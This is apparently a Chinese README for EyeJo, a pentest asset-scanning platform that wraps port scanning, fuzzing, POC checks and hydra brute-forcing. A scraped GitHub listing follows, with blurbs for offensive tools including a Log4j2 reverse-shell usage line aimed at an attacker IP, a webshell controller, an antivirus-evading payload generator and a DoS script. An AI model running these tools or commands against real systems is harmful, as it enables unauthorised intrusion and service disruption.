EyeJo是一款自动化资产风险评估平台,可以协助甲方安全人员或乙方安全人员对授权的资产中进行排查,快速发现存在的薄弱点和攻击面。

Overview

EyeJo

EyeJo是一款自动化资产风险评估平台,可以协助甲方安全人员或乙方安全人员对授权的资产中进行排查,快速发现存在的薄弱点和攻击面。

免责声明

本平台集成了大量的互联网公开工具,主要是方便安全人员整理、排查资产、安全测试等,切勿用于非法用途。使用者存在危害网络安全等任何非法行为,后果自负,作者不承担任何法律责任。

功能说明

功能 说明
输入目标 支持域名、IP段、IP范围。注:输入的域名会作为主域名,除了www
子域名收集 使用Oneforall收集子域名
Shodan和FOFA查询 使用Shodan API和Fofa API收集域名
端口扫描 使用naabu+nmap快速精准扫描端口服务
请求站点、截图 收集站点的网页截图、Title、icons、证书等
指纹识别 使用wappalyzer进行指纹识别(默认集成wappalyzer指纹库外加几十个常见应用指纹)
登录识别 会调用爬虫进行识别。请求站点、截图功能默认会通过指纹去识别
FUZZ 使用ffuf进行目录爆破
POC检测 使用pocsuite3进行poc检测(默认集成少量POC)
漏洞检测 crawlergo爬虫+xray的被动扫描(平台默认关闭了xray的poc检测)
服务爆破 使用hydra进行相应服务的爆破(默认集成服务字典)
结果导出 导出收集的资产

部署方式

docker部署

获取镜像

## 重新构建
## docker build -t mirchdocker/eyejo:latest -f docker/Dockerfile .
## 拉取最新
docker pull mirchdocker/eyejo

一键部署

cd docker
docker-compose up -d

登录

http://127.0.0.1:6103
密码: admin/[email protected]
数据库MySQL账号密码:root/[email protected]

账号操作

删除user1用户并新增用户admin/password

docker exec -it eyejo_mariadb mysql -u root -p
## 输入密码123456
use EyeJo;
delete from auth_user where username='user1';
docker exec -it eyejo_ubuntu bash
python3 manage.py initadmin --user admin --password password --email [email protected]

使用演示

  • 平台首页 平台首页

项目管理

  1. 项目管理 功能页面

  2. 新增项目 新增项目

  3. 项目详情

  • 3.1 站点详情
    对测试目标进行信息收集工作,帮助安全人员快速了解测试目标。包括指纹、标题、图标、截图等信息
    可以自定义对单个、多个站进行tag管理,分类后,可进行tag搜索,一个项目有大量目标时可方便筛选需要的数据 项目详情
  • 3.2 域名
    对测试目标收集子域名,扫描结果在此页面进行展示 域名
  • 3.3 IP
    对测试目标的IP进行端口扫描,扫描结果在此页面进行展示;通过当前IP信息可以查看旁站和C段信息。 IP C段
  • 3.4 登录接口识别 登录接口识别
  • 3.5资产组
    资产组包含了收集到的所有资产。 资产组
  • 3.5.1 新增资产组
    新增资产组有三种方式:添加已有资产、从tag添加资产、手动输入资产 新增资产组
  • 3.5.2 新增资产
    基于已有资产组新增资产有两种方式:从tag添加资产、手动输入资产 新增资产

任务管理

  1. 任务管理 任务管理 2.添加任务
    可以对已有项目的资产组添加任务 添加任务
  2. 漏洞
    漏洞:xray扫描结果
    POC:pocsuite3扫描结果
    fuzz:目录爆破结果
    服务爆破:端口服务爆破结果 漏洞 FUZZ

项目配置

  1. 项目配置

添加POC和指纹

可更新指纹库 eyejo/plugin/fingermap/data/wappalyzer.json
可更新POC eyejo/plugin/pocsuite3/pocs/模板参考

TODO

  • 分布式部署
  • POC、指纹管理、自定义fofa语法等
  • 资产监控
  • 漏洞消息推送

致谢

https://github.com/TophantTechnology/ARL
https://github.com/chaitin/xray
https://github.com/ffuf/ffuf
https://github.com/projectdiscovery/naabu
https://github.com/knownsec/pocsuite3
https://github.com/shmilylty/OneForAll
https://github.com/0Kee-Team/crawlergo
https://github.com/rverton/webanalyze

Chapter 1 of the AWS Cookbook

Chapter 1 - Security Set and export your default region: export AWS_REGION=us-east-1 Set your AWS ACCOUNT ID:: AWS_ACCOUNT_ID=$(aws sts get-caller-ide

AWS Cookbook 30 Nov 27, 2022
A python package with tools to read and postprocess the output of the channel DNS-solver (davecats/channel), as well as its associated postprocessing tools.

Python tools for davecats/channel A python package with tools to read and postprocess the output of the channel dns solver, as well as its associated

Andrea Andreolli 1 Dec 13, 2021
Log4j exploit catcher, detect Log4Shell exploits and try to get payloads.

log4j_catcher Log4j exploit catcher, detect Log4Shell exploits and try to get payloads. This is a basic python server that listen on a port and logs i

EntropyQueen 17 Dec 20, 2021
Log4jScanner is a Log4j Related CVEs Scanner, Designed to Help Penetration Testers to Perform Black Box Testing on given subdomains.

Log4jScanner Log4jScanner is a Log4j Related CVEs Scanner, Designed to Help Penetration Testers to Perform Black Box Testing on given subdomains. Disc

Pushpender Singh 35 Dec 12, 2022
Python Password Generator

This is a console-based version of a password generator written with Python. The program generates a password based on numbers of letters, numbers, and symbols specified by the user. This is a simple

p.katekomol 1 Jan 24, 2022
🔎 Most Advanced Open Source Intelligence (OSINT) Framework for scanning IP Address, Emails, Websites, Organizations.

🔎 Most Advanced Open Source Intelligence (OSINT) Framework for scanning IP Address, Emails, Websites, Organizations.

BhavKaran 1.5k Dec 28, 2022
A terminal based web shell controller

shell-hack Tribute to Chinese ant sword; A Powerful terminal based webshell controller; Usage : Usage : python3 shell-hack.py --url [URL] --w

s1mple 10 Dec 28, 2021
The Modern Hash Identification System

🔗 Don't know what type of hash it is? Name That Hash will name that hash type! 🤖 Identify MD5, SHA256 and 3000+ other hashes ☄ Comes with a neat web app 🔥

1.2k Dec 28, 2022
Proof of concept GnuCash Webinterface

Proof of Concept GnuCash Webinterface This may one day be a something truly great. Milestones [ ] Browse accounts and view transactions [ ] Record sim

Josh 14 Dec 28, 2022
Patching - Interactive Binary Patching for IDA Pro

Patching - Interactive Binary Patching for IDA Pro Overview Patching assembly code to change the behavior of an existing program is not uncommon in ma

589 Dec 30, 2022
Obfuscated Gradients Give a False Sense of Security: Circumventing Defenses to Adversarial Examples

Obfuscated Gradients Give a False Sense of Security: Circumventing Defenses to Adversarial Examples Above is an adversarial example: the slightly pert

Anish Athalye 838 Dec 18, 2022
带回显版本的漏洞利用脚本

CVE-2021-21978 带回显版本的漏洞利用脚本,更简单的方式 0. 漏洞信息 VMware View Planner Web管理界面存在一个上传日志功能文件的入口,没有进行认证且写入的日志文件路径用户可控,通过覆盖上传日志功能文件log_upload_wsgi.py,即可实现RCE 漏洞代码

3ky7in4 24 Nov 09, 2022
Tools ini digunakan untuk krekk pacebuk:v

E-Crack By Aang-XD Fitur Login • Login via token facebook • Login via cookie facebook Install On Termux $ pkg update && pkg upgrade $ pkg install pyth

Aang Ardiansyah-XD 2 Dec 24, 2021
Log4j2 CVE-2021-44228 revshell

Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At

FaisalFs 16 Mar 24, 2022
✨ Powerfull & Universal Link Bypasser ✨

✨ Powerfull & Universal Link Bypasser ✨

Vodkarm06 4 Jun 03, 2022
PyFUD - Fully Undetectable payload generator for metasploit

PyFUD fully Undetectable payload generator for metasploit Usage: pyfud.py --host

3 Mar 25, 2022
dos-atack-tor script de python que permite usar conexiones cebollas para atacar paginas .onion o paginas convencionales via tor.

script de python que permite usar conexiones cebollas para atacar paginas .onion o paginas convencionales via tor. tiene capacidad de ajustar la cantidad de informacion a enviar, el numero de hilos a

Desmon 2 Jun 01, 2022
A Python application to predict what is cooking

ez-cuisine-classifier A Python application to predict what is cooking Environment Python 3.9 Windows 10 Install python -m venv venv .\venv\Scripts\act

Zeheng Li 1 Jun 21, 2022
🐝 ℹ️ Honeybee extension for export to IES-VE gem file format

honeybee-ies Honeybee extension for export a HBJSON file to IES-VE GEM file format Installation pip install honeybee-ies QuickStart import pathlib fro

Ladybug Tools 4 Jul 12, 2022
This repository consists of the python scripts for execution and automation of vivid tasks.

Scripting.py is a repository being maintained to keep log of the python scripts that I create for automating and executing some of my boring manual task.

Prakriti Regmi 1 Feb 07, 2022